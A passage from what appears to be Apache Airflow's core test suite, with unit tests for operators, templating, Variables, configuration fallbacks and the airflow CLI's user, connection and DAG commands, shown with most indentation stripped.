sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timeout(self):
t = PythonOperator(
task_id='test_timeout',
execution_timeout=timedelta(seconds=1),
python_callable=lambda: sleep(5),
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_python_op(self):
def test_py_op(templates_dict, ds, **kwargs):
if not templates_dict['ds'] == ds:
raise Exception("failure")
t = PythonOperator(
task_id='test_py_op',
provide_context=True,
python_callable=test_py_op,
templates_dict={'ds': "{{ ds }}"},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_complex_template(self):
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
context['ds'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field={
'foo': '123',
'bar': ['baz', '{{ ds }}']
},
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_variable(self):
"""
Test the availability of variables in templates
"""
val = {
'test_value': 'a test value'
}
Variable.set("a_variable", val['test_value'])
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable(self):
"""
Test the availability of variables (serialized as JSON) in templates
"""
val = {
'test_value': {'foo': 'bar', 'obj': {'v1': 'yes', 'v2': 'no'}}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value']['obj']['v2'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.json.a_variable.obj.v2 }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable_as_value(self):
"""
Test the availability of variables (serialized as JSON) in templates, but
accessed as a value
"""
val = {
'test_value': {'foo': 'bar'}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
u'{"foo": "bar"}')
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_non_bool(self):
"""
Test templates can handle objects with no sense of truthiness
"""
class NonBoolObject(object):
def __len__(self):
return NotImplemented
def __bool__(self):
return NotImplemented
t = OperatorSubclass(
task_id='test_bad_template_obj',
some_templated_field=NonBoolObject(),
dag=self.dag)
t.resolve_template_files()
def test_task_get_template(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
context = ti.get_template_context()
# DEFAULT DATE is 2015-01-01
        self.assertEqual(context['ds'], '2015-01-01')
        self.assertEqual(context['ds_nodash'], '20150101')
        # next_ds is 2015-01-02 as the dag interval is daily
        self.assertEqual(context['next_ds'], '2015-01-02')
        self.assertEqual(context['next_ds_nodash'], '20150102')
        # prev_ds is 2014-12-31 as the dag interval is daily
        self.assertEqual(context['prev_ds'], '2014-12-31')
        self.assertEqual(context['prev_ds_nodash'], '20141231')
        self.assertEqual(context['ts'], '2015-01-01T00:00:00+00:00')
        self.assertEqual(context['ts_nodash'], '20150101T000000')
        self.assertEqual(context['ts_nodash_with_tz'], '20150101T000000+0000')
        self.assertEqual(context['yesterday_ds'], '2014-12-31')
        self.assertEqual(context['yesterday_ds_nodash'], '20141231')
        self.assertEqual(context['tomorrow_ds'], '2015-01-02')
        self.assertEqual(context['tomorrow_ds_nodash'], '20150102')
def test_import_examples(self):
self.assertEqual(len(self.dagbag.dags), NUM_EXAMPLE_DAGS)
def test_local_task_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(task_instance=ti, ignore_ti_state=True)
job.run()
def test_raw_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
def test_doctests(self):
modules = [utils, macros]
for mod in modules:
failed, tests = doctest.testmod(mod)
if failed:
raise Exception("Failed a doctest")
def test_variable_set_get_round_trip(self):
Variable.set("tested_var_set_id", "Monday morning breakfast")
self.assertEqual("Monday morning breakfast", Variable.get("tested_var_set_id"))
def test_variable_set_get_round_trip_json(self):
value = {"a": 17, "b": 47}
Variable.set("tested_var_set_id", value, serialize_json=True)
self.assertEqual(value, Variable.get("tested_var_set_id", deserialize_json=True))
def test_get_non_existing_var_should_return_default(self):
default_value = "some default val"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value))
def test_get_non_existing_var_should_not_deserialize_json_default(self):
default_value = "}{ this is a non JSON default }{"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value,
deserialize_json=True))
def test_variable_setdefault_round_trip(self):
key = "tested_var_setdefault_1_id"
value = "Monday morning breakfast in Paris"
Variable.setdefault(key, value)
self.assertEqual(value, Variable.get(key))
def test_variable_setdefault_round_trip_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.setdefault(key, value, deserialize_json=True)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_setdefault_existing_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.set(key, value, serialize_json=True)
val = Variable.setdefault(key, value, deserialize_json=True)
        # Check that both the returned value and the stored value are handled correctly.
self.assertEqual(value, val)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_parameterized_config_gen(self):
cfg = configuration.parameterized_config(configuration.DEFAULT_CONFIG)
# making sure some basic building blocks are present:
self.assertIn("[core]", cfg)
self.assertIn("dags_folder", cfg)
self.assertIn("sql_alchemy_conn", cfg)
self.assertIn("fernet_key", cfg)
# making sure replacement actually happened
self.assertNotIn("{AIRFLOW_HOME}", cfg)
self.assertNotIn("{FERNET_KEY}", cfg)
def test_config_use_original_when_original_and_fallback_are_present(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
configuration.conf.set("core", "FERNET_KEY_CMD", "printf HELLO")
FALLBACK_FERNET_KEY = configuration.conf.get(
"core",
"FERNET_KEY"
)
self.assertEqual(FERNET_KEY, FALLBACK_FERNET_KEY)
# restore the conf back to the original state
configuration.conf.remove_option("core", "FERNET_KEY_CMD")
def test_config_throw_error_when_original_and_fallback_is_absent(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.conf.get("core", "FERNET_KEY")
configuration.conf.remove_option("core", "FERNET_KEY")
with self.assertRaises(AirflowConfigException) as cm:
configuration.conf.get("core", "FERNET_KEY")
exception = str(cm.exception)
message = "section/key [core/fernet_key] not found in config"
self.assertEqual(message, exception)
# restore the conf back to the original state
configuration.conf.set("core", "FERNET_KEY", FERNET_KEY)
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
def test_config_override_original_when_non_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = "some value"
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_config_override_original_when_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = ""
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_round_time(self):
rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
def test_infer_time_unit(self):
self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
self.assertEqual('days', infer_time_unit([200000, 100000]))
def test_scale_time_units(self):
# use assert_almost_equal from numpy.testing since we are comparing
# floating point arrays
arr1 = scale_time_units([130, 5400, 10], 'minutes')
assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
decimal=3)
arr4 = scale_time_units([200000, 100000], 'days')
assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
def test_duplicate_dependencies(self):
regexp = "Dependency (.*)runme_0(.*)run_after_loop(.*) " \
"already registered"
with self.assertRaisesRegexp(AirflowException, regexp):
self.runme_0.set_downstream(self.run_after_loop)
with self.assertRaisesRegexp(AirflowException, regexp):
self.run_after_loop.set_upstream(self.runme_0)
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existent",
dag=self.dag)
def test_terminate_task(self):
"""If a task instance's db state get deleted, it should fail"""
TI = models.TaskInstance
dag = self.dagbag.dags.get('test_utils')
task = dag.task_dict.get('sleeps_forever')
ti = TI(task=task, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(
task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Running task instance asynchronously
p = multiprocessing.Process(target=job.run)
p.start()
sleep(5)
settings.engine.dispose()
session = settings.Session()
ti.refresh_from_db(session=session)
# making sure it's actually running
self.assertEqual(State.RUNNING, ti.state)
ti = session.query(TI).filter_by(
dag_id=task.dag_id,
task_id=task.task_id,
execution_date=DEFAULT_DATE
).one()
# deleting the instance should result in a failure
session.delete(ti)
session.commit()
# waiting for the async task to finish
p.join()
# making sure that the task ended up as failed
ti.refresh_from_db(session=session)
self.assertEqual(State.FAILED, ti.state)
session.close()
def test_task_fail_duration(self):
"""If a task fails, the duration should be recorded in TaskFail"""
p = BashOperator(
task_id='pass_sleepy',
bash_command='sleep 3',
dag=self.dag)
f = BashOperator(
task_id='fail_sleepy',
bash_command='sleep 5',
execution_timeout=timedelta(seconds=3),
retry_delay=timedelta(seconds=0),
dag=self.dag)
session = settings.Session()
try:
p.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except Exception:
pass
try:
f.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except Exception:
pass
p_fails = session.query(models.TaskFail).filter_by(
task_id='pass_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
f_fails = session.query(models.TaskFail).filter_by(
task_id='fail_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
self.assertEqual(0, len(p_fails))
self.assertEqual(1, len(f_fails))
self.assertGreaterEqual(sum([f.duration for f in f_fails]), 3)
def test_dag_stats(self):
"""Correctly sets/dirties/cleans rows of DagStat table"""
session = settings.Session()
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
models.DagStat.update([], session=session)
self.dag_bash.create_dagrun(
run_id="run1",
execution_date=DEFAULT_DATE,
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 1)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
self.dag_bash.create_dagrun(
run_id="run2",
execution_date=DEFAULT_DATE + timedelta(days=1),
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 2)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
session.query(models.DagRun).first().state = State.SUCCESS
session.commit()
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.SUCCESS).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.SUCCESS, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.RUNNING).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.RUNNING, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
session.close()
def test_run_command(self):
if six.PY3:
write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))'
else:
write = r'sys.stdout.write(u"\u1000foo".encode("utf8"))'
cmd = 'import sys; {0}; sys.stdout.flush()'.format(write)
self.assertEqual(run_command("python -c '{0}'".format(cmd)),
u'\u1000foo' if six.PY3 else 'foo')
self.assertEqual(run_command('echo "foo bar"'), u'foo bar\n')
self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"')
def test_trigger_dagrun_with_execution_date(self):
utc_now = timezone.utcnow()
run_id = 'trig__' + utc_now.isoformat()
def payload_generator(context, object):
object.run_id = run_id
return object
task = TriggerDagRunOperator(task_id='test_trigger_dagrun_with_execution_date',
trigger_dag_id='example_bash_operator',
python_callable=payload_generator,
execution_date=utc_now,
dag=self.dag)
task.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
dag_runs = models.DagRun.find(dag_id='example_bash_operator',
run_id=run_id)
        self.assertEqual(len(dag_runs), 1)
        dag_run = dag_runs[0]
        self.assertEqual(dag_run.execution_date, utc_now)
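# CliTests drives the argparse-based `airflow` CLI entry points (users,
# connections, pools, variables, dag and task commands) directly through
# airflow.bin.cli against the example DAGs.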
class CliTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(CliTests, cls).setUpClass()
cls._cleanup()
def setUp(self):
super(CliTests, self).setUp()
from airflow.www_rbac import app as application
configuration.load_test_config()
self.app, self.appbuilder = application.create_app(session=Session, testing=True)
self.app.config['TESTING'] = True
self.parser = cli.CLIFactory.get_parser()
self.dagbag = models.DagBag(dag_folder=DEV_NULL, include_examples=True)
settings.configure_orm()
self.session = Session
def tearDown(self):
self._cleanup(session=self.session)
super(CliTests, self).tearDown()
@staticmethod
def _cleanup(session=None):
if session is None:
session = Session()
session.query(models.Pool).delete()
session.query(models.Variable).delete()
session.commit()
session.close()
def test_cli_list_dags(self):
args = self.parser.parse_args(['list_dags', '--report'])
cli.list_dags(args)
def test_cli_list_dag_runs(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator', ]))
args = self.parser.parse_args(['list_dag_runs',
'example_bash_operator',
'--no_backfill'])
cli.list_dag_runs(args)
def test_cli_create_user_random_password(self):
args = self.parser.parse_args([
'users', '-c', '--username', 'test1', '--lastname', 'doe',
'--firstname', 'jon',
'--email', '[email protected]', '--role', 'Viewer', '--use_random_password'
])
cli.users(args)
def test_cli_create_user_supplied_password(self):
args = self.parser.parse_args([
'users', '-c', '--username', 'test2', '--lastname', 'doe',
'--firstname', 'jon',
'--email', '[email protected]', '--role', 'Viewer', '--password', 'test'
])
cli.users(args)
def test_cli_delete_user(self):
args = self.parser.parse_args([
'users', '-c', '--username', 'test3', '--lastname', 'doe',
'--firstname', 'jon',
'--email', '[email protected]', '--role', 'Viewer', '--use_random_password'
])
cli.users(args)
args = self.parser.parse_args([
'users', '-d', '--username', 'test3',
])
cli.users(args)
def test_cli_list_users(self):
for i in range(0, 3):
args = self.parser.parse_args([
'users', '-c', '--username', 'user{}'.format(i), '--lastname',
'doe', '--firstname', 'jon',
'--email', 'jdoe+{}@gmail.com'.format(i), '--role', 'Viewer',
'--use_random_password'
])
cli.users(args)
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.users(self.parser.parse_args(['users', '-l']))
stdout = mock_stdout.getvalue()
for i in range(0, 3):
self.assertIn('user{}'.format(i), stdout)
def test_cli_sync_perm(self):
# test whether sync_perm cli will throw exceptions or not
args = self.parser.parse_args([
'sync_perm'
])
cli.sync_perm(args)
def test_cli_list_tasks(self):
for dag_id in self.dagbag.dags.keys():
args = self.parser.parse_args(['list_tasks', dag_id])
cli.list_tasks(args)
args = self.parser.parse_args([
'list_tasks', 'example_bash_operator', '--tree'])
cli.list_tasks(args)
@mock.patch("airflow.bin.cli.db_utils.initdb")
def test_cli_initdb(self, initdb_mock):
cli.initdb(self.parser.parse_args(['initdb']))
initdb_mock.assert_called_once_with(False)
@mock.patch("airflow.bin.cli.db_utils.resetdb")
def test_cli_resetdb(self, resetdb_mock):
cli.resetdb(self.parser.parse_args(['resetdb', '--yes']))
resetdb_mock.assert_called_once_with(False)
def test_cli_connections_list(self):
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(['connections', '--list']))
stdout = mock_stdout.getvalue()
conns = [[x.strip("'") for x in re.findall("'\w+'", line)[:2]]
for ii, line in enumerate(stdout.split('\n'))
if ii % 2 == 1]
conns = [conn for conn in conns if len(conn) > 0]
# Assert that some of the connections are present in the output as
# expected:
self.assertIn(['aws_default', 'aws'], conns)
self.assertIn(['beeline_default', 'beeline'], conns)
self.assertIn(['emr_default', 'emr'], conns)
self.assertIn(['mssql_default', 'mssql'], conns)
self.assertIn(['mysql_default', 'mysql'], conns)
self.assertIn(['postgres_default', 'postgres'], conns)
self.assertIn(['wasb_default', 'wasb'], conns)
self.assertIn(['segment_default', 'segment'], conns)
# Attempt to list connections with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--list', '--conn_id=fake', '--conn_uri=fake-uri',
'--conn_type=fake-type', '--conn_host=fake_host',
'--conn_login=fake_login', '--conn_password=fake_password',
'--conn_schema=fake_schema', '--conn_port=fake_port', '--conn_extra=fake_extra']))
stdout = mock_stdout.getvalue()
# Check list attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--list flag: ['conn_id', 'conn_uri', 'conn_extra', " +
"'conn_type', 'conn_host', 'conn_login', " +
"'conn_password', 'conn_schema', 'conn_port']"),
])
def test_cli_connections_list_redirect(self):
cmd = ['airflow', 'connections', '--list']
with tempfile.TemporaryFile() as fp:
p = subprocess.Popen(cmd, stdout=fp)
p.wait()
self.assertEqual(0, p.returncode)
def test_cli_connections_add_delete(self):
# Add connections:
uri = 'postgresql://airflow:airflow@host:5432/airflow'
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new2',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new3',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new4',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new5',
'--conn_type=hive_metastore', '--conn_login=airflow',
'--conn_password=airflow', '--conn_host=host',
'--conn_port=9083', '--conn_schema=airflow']))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new6',
'--conn_uri', "", '--conn_type=google_cloud_platform', '--conn_extra', "{'extra': 'yes'}"]))
stdout = mock_stdout.getvalue()
# Check addition stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tSuccessfully added `conn_id`=new1 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new2 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new3 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new4 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new5 : " +
"hive_metastore://airflow:airflow@host:9083/airflow"),
("\tSuccessfully added `conn_id`=new6 : " +
"google_cloud_platform://:@:")
])
# Attempt to add duplicate
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tA connection with `conn_id`=new1 already exists",
])
# Attempt to add without providing conn_id
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_id']"),
])
# Attempt to add without providing conn_uri
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new']))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_uri or conn_type']"),
])
# Prepare to add connections
session = settings.Session()
extra = {'new1': None,
'new2': None,
'new3': "{'extra': 'yes'}",
'new4': "{'extra': 'yes'}"}
# Add connections
for index in range(1, 6):
conn_id = 'new%s' % index
result = (session
.query(Connection)
.filter(Connection.conn_id == conn_id)
.first())
result = (result.conn_id, result.conn_type, result.host,
result.port, result.get_extra())
if conn_id in ['new1', 'new2', 'new3', 'new4']:
self.assertEqual(result, (conn_id, 'postgres', 'host', 5432,
extra[conn_id]))
elif conn_id == 'new5':
self.assertEqual(result, (conn_id, 'hive_metastore', 'host',
9083, None))
elif conn_id == 'new6':
self.assertEqual(result, (conn_id, 'google_cloud_platform',
None, None, "{'extra': 'yes'}"))
# Delete connections
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new1']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new2']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new3']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new4']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new5']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new6']))
stdout = mock_stdout.getvalue()
# Check deletion stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tSuccessfully deleted `conn_id`=new1",
"\tSuccessfully deleted `conn_id`=new2",
"\tSuccessfully deleted `conn_id`=new3",
"\tSuccessfully deleted `conn_id`=new4",
"\tSuccessfully deleted `conn_id`=new5",
"\tSuccessfully deleted `conn_id`=new6"
])
# Check deletions
for index in range(1, 7):
conn_id = 'new%s' % index
result = (session.query(Connection)
.filter(Connection.conn_id == conn_id)
.first())
self.assertTrue(result is None)
        # Attempt to delete a non-existing connection
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tDid not find a connection with `conn_id`=fake",
])
# Attempt to delete with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake',
'--conn_uri=%s' % uri, '--conn_type=fake-type']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--delete flag: ['conn_uri', 'conn_type']"),
])
session.close()
def test_cli_test(self):
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0', '--dry_run',
DEFAULT_DATE.isoformat()]))
def test_cli_test_with_params(self):
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'also_run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
def test_cli_run(self):
cli.run(self.parser.parse_args([
'run', 'example_bash_operator', 'runme_0', '-l',
DEFAULT_DATE.isoformat()]))
def test_task_state(self):
cli.task_state(self.parser.parse_args([
'task_state', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
def test_dag_state(self):
self.assertEqual(None, cli.dag_state(self.parser.parse_args([
'dag_state', 'example_bash_operator', DEFAULT_DATE.isoformat()])))
def test_pause(self):
args = self.parser.parse_args([
'pause', 'example_bash_operator'])
cli.pause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [True, 1])
args = self.parser.parse_args([
'unpause', 'example_bash_operator'])
cli.unpause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [False, 0])
def test_subdag_clear(self):
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm'])
cli.clear(args)
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm', '--exclude_subdags'])
cli.clear(args)
def test_parentdag_downstream_clear(self):
args = self.parser.parse_args([
'clear', 'example_subdag_operator.section-1', '--no_confirm'])
cli.clear(args)
args = self.parser.parse_args([
'clear', 'example_subdag_operator.section-1', '--no_confirm',
'--exclude_parentdag'])
cli.clear(args)
def test_get_dags(self):
dags = cli.get_dags(self.parser.parse_args(['clear', 'example_subdag_operator',
'-c']))
self.assertEqual(len(dags), 1)
dags = cli.get_dags(self.parser.parse_args(['clear', 'subdag', '-dx', '-c']))
self.assertGreater(len(dags), 1)
with self.assertRaises(AirflowException):
cli.get_dags(self.parser.parse_args(['clear', 'foobar', '-dx', '-c']))
def test_backfill(self):
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-t', 'runme_0', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-l',
'-s', DEFAULT_DATE.isoformat()]))
def test_process_subdir_path_with_placeholder(self):
self.assertEqual(os.path.join(settings.DAGS_FOLDER, 'abc'), cli.process_subdir('DAGS_FOLDER/abc'))
def test_trigger_dag(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'-c', '{"foo": "bar"}']))
self.assertRaises(
ValueError,
cli.trigger_dag,
self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'--run_id', 'trigger_dag_xxx',
'-c', 'NOT JSON'])
)
def test_delete_dag(self):
DM = models.DagModel
key = "my_dag_id"
session = settings.Session()
session.add(DM(dag_id=key))
session.commit()
cli.delete_dag(self.parser.parse_args([
'delete_dag', key, '--yes']))
self.assertEqual(session.query(DM).filter_by(dag_id=key).count(), 0)
self.assertRaises(
AirflowException,
cli.delete_dag,
self.parser.parse_args([
'delete_dag',
'does_not_exist_dag',
'--yes'])
)
def test_pool_create(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
self.assertEqual(self.session.query(models.Pool).count(), 1)
def test_pool_get(self):
